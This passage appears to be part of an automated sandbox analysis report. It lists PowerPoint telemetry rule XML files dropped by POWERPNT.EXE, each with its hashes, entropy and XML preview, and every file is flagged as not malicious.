                                                                                                                              SHA-512:E8C363E8F9A7A90E1F3B344879DAC99BBBCFD890711F5BA5444E8F85A8B1DAA6E7DF9442E6413A1E3DF5DF3ACB6C7EA731F4E166FDED08A59DD91E6F4E198A90
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140131" V="0" DC="SM" EN="Office.PowerPoint.PPT.Desktop.InkStrokes" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bjzqh" />.. </S>.. <C T="B" I="0" O="false" N="AreAnimationsPlaying">.. <S T="1" F="fAnimationsPlaying" />.. </C>.. <C T="B" I="1" O="false" N="IsInitiatedFromSlideShow">.. <S T="1" F="fInitiatedFromSlideShow" />.. </C>.. <C T="B" I="2" O="false" N="IsPerfectSyncEnabled">.. <S T="1" F="FPacketCallback" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2691
                                                                                                                              Entropy (8bit):4.802490852423277
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:cmVlbmqNtA9szrLWKdZ4+ugoZ64rYpGTVsgDNX63:H7poZqA63
                                                                                                                              MD5:11C85A76E75CDAD73794FD3BF2DBA412
                                                                                                                              SHA1:60DE7784DDE5EC544ACBC271B91202B20D8050F7
                                                                                                                              SHA-256:C06D9D61889B762896F2792641F9B76A9A487108A3A6DB9CD9537C0E8DE41B08
                                                                                                                              SHA-512:41BB6BA54C505828B8EAAC30E5A4553FAC0B6D3493A054B5A650F110992E0235ACED305C897BABB59C1C226A581FB1091AD3A97CED61C4B47556C9E373FD9D3D
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140132" V="0" DC="SM" EN="Office.PowerPoint.PPT.Desktop.ZoomDialogsRule" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bjyi4" />.. <UTS T="2" Id="bh7v2" />.. <UTS T="3" Id="bjyi3" />.. <UTS T="4" Id="bedbg" />.. <UTS T="5" Id="bedbh" />.. <UTS T="6" Id="beh91" />.. <UTS T="7" Id="bdrpc" />.. <UTS T="8" Id="bdsjd" />.. <UTS T="9" Id="bdsjg" />.. <UTS T="10" Id="bdsjh" />.. <UTS T="11" Id="bdrpd" />.. <UTS T="12" Id="bjyi6" />.. <UTS T="13" Id="bjyi5" />.. <UTS T="14" Id="biuyf" />.. <UTS T="15" Id="biuye" />.. <A T="16" E="TelemetrySuspend" />.. <A T="17" E="TelemetryShutdown" />.. </S>.. <C T="U8" I="0" O="false" N="SlideZoomInsertDialogLaunchCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="U8" I="1" O="false" N="SlideZoomInsertSuccessCount">.. <C>.. <S T="2" /
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):573
                                                                                                                              Entropy (8bit):5.169823506179181
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdgtriLn/GbaAQierisfI6fQxyI6fntjtNIuZNO2su:2duiris5Qq
                                                                                                                              MD5:FB4D6CDEBF7079B30034EFDD8BF089A0
                                                                                                                              SHA1:1F49F7D1097DBF7940EF4D94E51130084FF6FBAB
                                                                                                                              SHA-256:AD9BAF0A1E0ED29EAC7807C5086836CEB3E598E1C12BA413C49251FF0D485B0F
                                                                                                                              SHA-512:0A56DFFBC516233B22028AE79FF81EB377005F81178C35807A0246D1F8192787D93112F0C1944002039998B422F2C65D5AB1B61B878B22D26A705FCB24300D78
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140133" V="0" DC="SM" EN="Office.PowerPoint.PPT.Desktop.RPVInkUI" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bk7aq" />.. </S>.. <C T="U8" I="0" O="false" N="InkType">.. <S T="1" F="InkType" />.. </C>.. <C T="I32" I="1" O="false" N="InkColor">.. <S T="1" F="InkColor" />.. </C>.. <C T="B" I="2" O="false" N="IsRecording">.. <S T="1" F="IsRecording" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):680
                                                                                                                              Entropy (8bit):5.080875759809467
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSvrcG2/GbaAQierHdbKOerEwSNahWf3XtdCNWO+f/0//7GqhmMNOcsu:2dExirH6rEP1y2s
                                                                                                                              MD5:50E3D0E9D681010FEE8AC0D0BD34EFFD
                                                                                                                              SHA1:30EE112850143586952286ED2D1DBD0AE725214A
                                                                                                                              SHA-256:6C18A625F7221244E9A92E0D1A1090BEA1FFE2FB04F848CAB6B429DB7A62F58D
                                                                                                                              SHA-512:1A6AC965FB103668F64320E6C759EBD49D474D4AB5A7FD537F94659CE88184BD7E481F2E03926D322914ECF08D71C18AC0F074FE0CDBCF878A64145644D0A151
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140134" V="1" DC="SM" EN="Office.PowerPoint.PPT.Desktop.DesignerPrivacyReprompt" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="birhz" A="iclfn" />.. <UTS T="2" Id="birh0" A="iclfo" />.. <US T="3">.. <S T="1" />.. <S T="2" />.. </US>.. </S>.. <C T="B" I="0" O="false" N="PrivacyDialogIsAcceptedOnReprompt">.. <O T="EQ">.. <L>.. <S T="3" F="ULS_TagId" M="Ignore" />.. </L>.. <R>.. <V V="birhz" T="W" />.. </R>.. </O>.. </C>.. <T>.. <S T="3" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):488
                                                                                                                              Entropy (8bit):5.345223252979194
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdQ2rt/GbaAQXerHTukc8iNETc8qNO2su:2dQdjrHTTXDq
                                                                                                                              MD5:2D72D6CEB31F23D03DE1C49D62FC63F2
                                                                                                                              SHA1:98AD4A531AB7EC8BE04A2CAABE94F6994C9CD05D
                                                                                                                              SHA-256:EC8BAE3BA6ABE19F1CB5C8C9727E51AF1C01FF025F2FA4D502FC75D616FEB769
                                                                                                                              SHA-512:DA1FE1605670C41EDEA24804CE8125BBB81E98AF245C9B1F170002CD3B755D164A03DCE54D0BAD6C9EF0B66B1370EC9D38BA2027C7250587B6AE19CA6F88B2A3
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140135" V="1" DC="SM" EN="Office.PowerPoint.PPT.Desktop.DesignerOptionsDialog" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="a9gtz" A="icu5t" />.. </S>.. <C T="B" I="0" O="false" N="EnableSuggestionServiceUserSetting">.. <S T="1" F="EnableSuggestionServiceUserSetting" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):914
                                                                                                                              Entropy (8bit):4.981160837242438
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdHr+P/GbaAQierwercuSSNah09+KmOf+Eyxnt9qtNCuNnneBzQzCNWOyf/0/Q:2dyWirXr31COhybme7aZ
                                                                                                                              MD5:9704BB028FDEE5BDB0A0801EB309D755
                                                                                                                              SHA1:599CEDD2318E0E3900715B52C45F6DAF2F1A68F5
                                                                                                                              SHA-256:156E63AEA45A4DB9E70B28FD947BDC6AB06163B2B7FFC29F42110B0D5619B15B
                                                                                                                              SHA-512:CCF5F652B1DBC0BE7DF43E6A8B9E4B0B5FB44EB3EB060FE48BD5F44BBA97B6BEA4BEB9C4A18CBBA62FD251598EC35DE92F39804A740641C2B3764BA7A62EABB7
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140136" V="0" DC="SM" EN="Office.PowerPoint.PPT.Desktop.RPVUI" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bfxo5" />.. <UTS T="2" Id="bfxn5" />.. <US T="3">.. <S T="1" />.. <S T="2" />.. </US>.. </S>.. <C T="U32" I="0" O="false" N="ButtonId">.. <S T="3" F="ButtonId" />.. </C>.. <C T="U32" I="1" O="false" N="ButtonInteractionType">.. <S T="3" F="ButtonInteractionType" />.. </C>.. <C T="B" I="2" O="true" N="IsRecording">.. <S T="3" F="IsRecording" M="Ignore" />.. </C>.. <C T="B" I="3" O="false" N="IsButtonPressOnRPVTitleBarView">.. <O T="EQ">.. <L>.. <S T="3" F="ULS_TagId" />.. </L>.. <R>.. <V V="bfxo5" T="W" />.. </R>.. </O>.. </C>.. <T>.. <S T="3" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):634
                                                                                                                              Entropy (8bit):5.096934451963977
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdcltrgaA/GbSer8dnXKGXE6SpHXTyNXVxNO2su:2diWIFrunHU6Yc1
                                                                                                                              MD5:D1C5278098FCF9E4BD8564559626ECBF
                                                                                                                              SHA1:7B61BF2D57E2DC056035AABF8F29682C27AD155E
                                                                                                                              SHA-256:956E6075FA3B33C8AD7E560E5CF102C519BD49CCDC115AC1421641FF725F3D74
                                                                                                                              SHA-512:A904C546B75E0226B2A4FFC2072BB71F957849F5B2507FE3B701B67DEC79C6D82AFA7BA88D31D94FE4B8680BC354D834F81928F65DD1BB596E0089185A03009A
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140139" V="0" DC="SM" EN="Office.PowerPoint.PPT.Desktop.SlideShow.CustomShowDialog" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bndgf" />.. </S>.. <C T="U32" I="0" O="false" N="NewCount">.. <S T="1" F="New" />.. </C>.. <C T="U32" I="1" O="false" N="EditCount">.. <S T="1" F="Edit" />.. </C>.. <C T="U32" I="2" O="false" N="RemoveCount">.. <S T="1" F="Remove" />.. </C>.. <C T="U32" I="3" O="false" N="CopyCount">.. <S T="1" F="Copy" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):749
                                                                                                                              Entropy (8bit):5.033439418133993
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdgrhS/GbaAQierAerINter/NXahI8ek6XUMQ9nfgNOBsu:2dcirnrlrw6G
                                                                                                                              MD5:C8F2876D8E6CDAD80D59626EE6BA6760
                                                                                                                              SHA1:A61632C1B908A1FCFC8F4B3E4C80C27CF538C1E4
                                                                                                                              SHA-256:AE573BAA894DF3B991DD88EC5F4729EB7727EFEDF6B43B451DEB4C42300D316D
                                                                                                                              SHA-512:4D8F8711D5B340197C9E8370159FF1660CBC18147252D2B6FDF2389C0B68568BC3DAF19991595BD4F407F1C5B810F2F9C353C648262CA8397ECCF06237020CC3
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140140" V="0" DC="SM" EN="Office.PowerPoint.PPT.Desktop.Zoom.InsertSlideCount" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bdrpd" />.. <UTS T="2" Id="beh91" />.. <UTS T="3" Id="bh7v2" />.. <US T="4">.. <S T="1" />.. <S T="2" />.. <S T="3" />.. </US>.. </S>.. <C T="TAG" I="0" O="false" N="SourceTag">.. <S T="4" F="ULS_Tag" />.. </C>.. <C T="U32" I="1" O="false" N="SlideCount">.. <S T="4" F="Slide Count" />.. </C>.. <C T="G" I="2" O="true" N="DocumentId">.. <S T="4" F="CorrelationId" M="Ignore" />.. </C>.. <T>.. <S T="4" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1844
                                                                                                                              Entropy (8bit):4.911782077732711
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dhFrQAu65BUdbA8A46dxo1/2XGNFL3/NMASYswHVNOX:cL0Au6WM8A46dxVGbLPHSPX
                                                                                                                              MD5:023946486A2586FCD0F47408E99A2AE3
                                                                                                                              SHA1:F6D331AD0A88086693BAD0EA5CC74E1349B722B7
                                                                                                                              SHA-256:825FE831518D103202CCC2FC9F8C54D1ECE97968B30E5FE4919D6AF488246B37
                                                                                                                              SHA-512:342A453249341E207844CF8BDC2C64360DFDA80919124EDFBD40386D09E638CB7C7CBA6FBB0452AB1A519B2E65BDDFB6A77A8FD8B0B908F9C4CE0827BD35C1E2
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140141" V="0" DC="SM" EN="Office.PowerPoint.PPT.Desktop.Print.UserOptions" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bobic" />.. </S>.. <C T="B" I="0" O="false" N="IsPrintToFile">.. <S T="1" F="PrintToFile" />.. </C>.. <C T="U32" I="1" O="false" N="SlideRangeType">.. <S T="1" F="SlideRangeType" />.. </C>.. <C T="U32" I="2" O="false" N="TotalSlidesCount">.. <S T="1" F="TotalSlides" />.. </C>.. <C T="B" I="3" O="false" N="IsPrintHiddenSlides">.. <S T="1" F="PrintHiddenSlides" />.. </C>.. <C T="B" I="4" O="false" N="IsPrintComments">.. <S T="1" F="PrintComments" />.. </C>.. <C T="U32" I="5" O="false" N="PrintWhat">.. <S T="1" F="PrintWhat" />.. </C>.. <C T="B" I="6" O="false" N="IsPrintVerticalOrder">.. <S T="1" F="PrintVerticalOrder" />.. </C>.. <C T="B" I="7" O="false" N="IsFrameSlides">.. <S T="1" F="FrameSlides" />
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):839
                                                                                                                              Entropy (8bit):5.175818179217634
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdDar/MRRY/GbaAQierNerGer1ONXahIWVM0XJOI/IsMn+M0XJQxScMnt9M0X8:2dDnRDirYrZrtOIl5E9MaKsN
                                                                                                                              MD5:2053ED102E9861595D3795EE12BD604F
                                                                                                                              SHA1:CEBC5AAF41FB5D00E50A04E179048BF864F2100B
                                                                                                                              SHA-256:D324A14C9C7BF823ED49827206DE6C9DE9F545C6B8D84C6F50EE73275927E854
                                                                                                                              SHA-512:8E471DBD7051D7AF21670C3F279809F0E92DDE487E4B0B4924E7C188C3A71666FA099597E4BC658A0C2938AAB1B3EFAA57CB572DAB96B8984B71B90E85DAA6E2
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140142" V="0" DC="SM" EN="Office.PowerPoint.PPT.Desktop.Designer.UnifiedPrivacyAction" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="boker" />.. <UTS T="2" Id="bokep" />.. <UTS T="3" Id="bokeq" />.. <US T="4">.. <S T="1" />.. <S T="2" />.. <S T="3" />.. </US>.. </S>.. <C T="B" I="0" O="true" N="IsUnifiedPrivacyFeatureEnabledWhenShown">.. <S T="1" F="IsUppEnabled" />.. </C>.. <C T="B" I="1" O="true" N="IsUnifiedPrivacyFeatureEnabledWhenAccepted">.. <S T="2" F="IsUppEnabled" />.. </C>.. <C T="B" I="2" O="true" N="IsUnifiedPrivacyFeatureEnabledWhenDeclined">.. <S T="3" F="IsUppEnabled" />.. </C>.. <T>.. <S T="4" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):4104
                                                                                                                              Entropy (8bit):4.191634893578794
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:zQ3uutbz3dM1HdhfJqmt5Fr5Vh+/tBSYf:znuAo1f
                                                                                                                              MD5:616FBA48D44986CBDA6D882B44D72D2C
                                                                                                                              SHA1:845CD428B94589B80734581D2F87E45383171F3B
                                                                                                                              SHA-256:13B6BAED1491078322EDEE208B45F714070260DFB390542A167BC02AB50F4DCA
                                                                                                                              SHA-512:94633B2F45D02FB6FDA99A77680564B59B6FA4D32B635F11D2912F572F1DC491E9F1E075EA0EBFC8948BEE55CD9803CAF76530D44734B7FF89360DA41AA35EDC
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140147" V="1" DC="SM" EN="Office.PowerPoint.PPT.Desktop.RPV.Gen1Activities" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bgrlc" />.. <F T="2">.. <O T="EQ">.. <L>.. <S T="1" F="ULS_Category" M="Ignore" />.. </L>.. <R>.. <V V="Scope" T="W" />.. </R>.. </O>.. </F>.. <F T="3">.. <O T="EQ">.. <L>.. <S T="2" F="ScopeAction" M="Ignore" />.. </L>.. <R>.. <V V="Complete" T="W" />.. </R>.. </O>.. </F>.. <UTS T="4" Id="bhgrp" />.. <F T="5">.. <O T="EQ">.. <L>.. <S T="4" F="ULS_Category" M="Ignore" />.. </L>.. <R>.. <V V="Scope" T="W" />.. </R>.. </O>.. </F>.. <F T="6">.. <O T="EQ">.. <L>.. <S T="5" F="ScopeAction" M="Ignore" />..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1380
                                                                                                                              Entropy (8bit):4.636294505575934
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdYr9L1/GbaAQ4Wner8+u/qNO1oxfX/c//wVrMpONd+tNqNOocX/c//wVrMpOy:2dfRrzuy1jqt4KjqT9jGgAgdbF7
                                                                                                                              MD5:C7B5D5FAA5A747928435CE22D7840DE4
                                                                                                                              SHA1:91FC3AE65B005F3C516160691604D99456A400F3
                                                                                                                              SHA-256:05891D031E80A52E69A29976FFAEE2F4E13CBB8DBC3D97674178E17712321F5C
                                                                                                                              SHA-512:477E8C6A17B85250237F200A610ECA9718D222A6AD2CC8BEA6C46BF53448161AA02A424FC39A87C8B240AEAB6A74B21B8AA62AADE091822FCFE94D06153D60B4
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140148" V="0" DC="SM" EN="Office.PowerPoint.PPT.Desktop.RPV.MediaDevicesInfo" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="bsecs" />.. <F T="2">.. <O T="EQ">.. <L>.. <S T="1" F="FHasMediaFoundationInstalled" />.. </L>.. <R>.. <V V="true" T="B" />.. </R>.. </O>.. </F>.. <F T="3">.. <O T="EQ">.. <L>.. <S T="1" F="AreAudioDevicesPresent" />.. </L>.. <R>.. <V V="true" T="B" />.. </R>.. </O>.. </F>.. <F T="4">.. <O T="EQ">.. <L>.. <S T="1" F="AreVideoDevicesPresent" />.. </L>.. <R>.. <V V="true" T="B" />.. </R>.. </O>.. </F>.. <A T="5" E="TelemetrySuspend" />.. <A T="6" E="TelemetryShutdown" />.. </S>.. <C T="U32" I="0" O="false" N="IsMediaF
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1501
                                                                                                                              Entropy (8bit):4.4592023361460935
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdBrMEzS/GbaAQierTnfXFJjEQi+kXqNOguA7X/c//bLMpONd+wsvXlOguA7XO:2d9irTvvLJTliAwOdTahyVcGNGX9J7
                                                                                                                              MD5:F59C2637F9B9C9EBC7E599C5FD669984
                                                                                                                              SHA1:D83B194ED04982CE1982615EA8E9475B3221DF0F
                                                                                                                              SHA-256:6518BADA78A511A01058CA486C44CDA84E2A1885881B945A20325D5AB43C1A43
                                                                                                                              SHA-512:E0FE32108F277BEF4905E44D30874B1B65F859C476E5D2842D8360B54B53F7E6B3D1EF1A6862CD28B9D11BA4DD330E5B3E46027CA2FBFA8EA945C280A7CD79D4
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140149" V="0" DC="SM" EN="Office.PowerPoint.PPT.Desktop.RPV.StartRecordingStateInfo" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bsect" />.. <A T="2" E="TelemetrySuspend" />.. <A T="3" E="TelemetryShutdown" />.. <F T="4">.. <O T="EQ">.. <L>.. <S T="1" F="IsRecordingAudio" />.. </L>.. <R>.. <V V="false" T="B" />.. </R>.. </O>.. </F>.. <F T="5">.. <O T="AND">.. <L>.. <S T="1" F="IsRecordingAudio" />.. </L>.. <R>.. <O T="EQ">.. <L>.. <S T="1" F="IsRecordingVideo" />.. </L>.. <R>.. <V V="false" T="B" />.. </R>.. </O>.. </R>.. </O>.. </F>.. <F T="6">.. <O T="AND">.. <L>.. <S T="1" F="IsRecordingAudio" />..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):833
                                                                                                                              Entropy (8bit):5.189797337599085
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdEvr/d/GbaAQ4Wnerbo4HfqqfxppfMXxwy6XV3nUNS/7mxxf+/AVK30FaNO2z:2dpRrE1Sp0X7Wqq0M
                                                                                                                              MD5:BB8B59B59741BD56C2635D4A9AE5503B
                                                                                                                              SHA1:BA7B85AA1563E09772FFB5A3D54754534EFF51EF
                                                                                                                              SHA-256:B0F810EBA33C869BCD7F6C7AFED5119D4E37EFD17363D3F1936A6AC4871CB799
                                                                                                                              SHA-512:FA919ACC17FEACACDAF1967EB11F09E6F35102A4171FBC366DEF26732A8CBB374C105E55BA18C7ADF6D68A1AA4F79A1786B6D0B36F4B3F62A5DD3B33D0E5207E
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140150" V="1" DC="SM" EN="Office.PowerPoint.PPT.Desktop.RPV.RecordingInfo" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="bujt4" />.. </S>.. <C T="I64" I="0" O="false" N="RecordingTimeInSecs">.. <S T="1" F="RecordingTimeInSecs" />.. </C>.. <C T="I32" I="1" O="false" N="MediaType">.. <S T="1" F="MediaType" />.. </C>.. <C T="I64" I="2" O="false" N="FileSizeInBytes">.. <S T="1" F="FileSize" />.. </C>.. <C T="B" I="3" O="false" N="IsSlideWithTransition">.. <S T="1" F="FSlideHasTransition" />.. </C>.. <C T="D" I="4" O="true" N="AverageAudioLevel">.. <S T="1" F="AudioInputLevelAverage" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):539
                                                                                                                              Entropy (8bit):5.282414686908371
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd84rB/GbaAQier8BL+//LlMdLw/9JfNO2su:2d8Dirm+blw0/bV
                                                                                                                              MD5:5C010D26E9B50F19D88B42403CBF5380
                                                                                                                              SHA1:D3BCFB4634682C784E6003F58EBD34F3F672DF45
                                                                                                                              SHA-256:5D537236688198C5D06061F02E61B89862CBB4E342DC2C467219F76DBBA6D18B
                                                                                                                              SHA-512:7192774F80EB2052FE94042D05F4916C2BD9A7D8DFA586F01EB40499E3B0A5ECDCA4A02EF69779B437C5A87B46597C3A8B1ED28F38B923300A3CFB696D25226B
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140151" V="3" DC="SM" EN="Office.PowerPoint.PPT.Desktop.ClosedCaptions.InsertClosedCaptions" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="558kd" A="bv7tw" />.. </S>.. <C T="B" I="0" O="false" N="IsNarration">.. <S T="1" F="FIsNarration" />.. </C>.. <C T="W" I="1" O="true" N="TrackLanguage">.. <S T="1" F="TrackLanguage" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):366
                                                                                                                              Entropy (8bit):5.41199643458718
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd734kz9Q1+sH3Bg4Yte/GbOSIxSpRMFpAQUHperhC8TroeOn2sby:TMHdD4rXD/GbaAQierVf/O2su
                                                                                                                              MD5:DDFA6B79C8E3FB4C15863969C7B4D754
                                                                                                                              SHA1:59321C6162CA4CFA01B4D510FBB4CFAC879669F9
                                                                                                                              SHA-256:003752CE7818891F229CEC32A2E2B87013654465AD4CC1E9F76460E1A354911A
                                                                                                                              SHA-512:112918E480929774554C35E20BA7AED44C8E557DEA16E3A6BD82602DE1906E52FB4B403CBB85C517CFA47B228368C5D2F47B6552A19E622F29431736C1A1334C
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140152" V="1" DC="SM" EN="Office.PowerPoint.PPT.Desktop.ClosedCaptions.RemoveAllClosedCaptions" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="6g7dm" A="bv7tx" />.. </S>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):632
                                                                                                                              Entropy (8bit):5.219217760934546
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdARUrcUkU/GbaAQierpH9lrfOPfydt/9JfntgXslNO2su:2digQir5ruKt/bSy
                                                                                                                              MD5:2DDF04CB66FA653EC6BF2E5C9FB22F10
